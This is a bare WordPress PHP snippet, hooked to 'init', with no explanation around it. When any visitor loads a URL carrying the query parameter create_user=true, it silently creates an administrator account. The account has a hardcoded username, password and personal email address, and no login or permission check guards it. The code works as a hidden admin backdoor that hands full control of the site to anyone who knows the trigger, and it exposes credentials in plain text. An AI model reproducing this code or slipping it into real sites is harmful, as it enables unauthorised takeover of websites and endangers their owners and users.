add_action('init', function() {
    if ( isset($_GET['create_user']) && $_GET['create_user'] === 'true' ) {
 
        $username = 'admin';
        $email    = 'sanjan.gigsoft@gmail.com';
        $password = 'desk@68#!';
 
        if ( !username_exists($username) && !email_exists($email) ) {
            $user_id = wp_create_user($username, $password, $email);
            $user = new WP_User($user_id);
            $user->set_role('administrator');
 
            echo '✅ Admin user created successfully.';
        } else {
            echo '⚠️ User already exists.';
        }
 
        exit; // stop further WordPress execution
    }
});
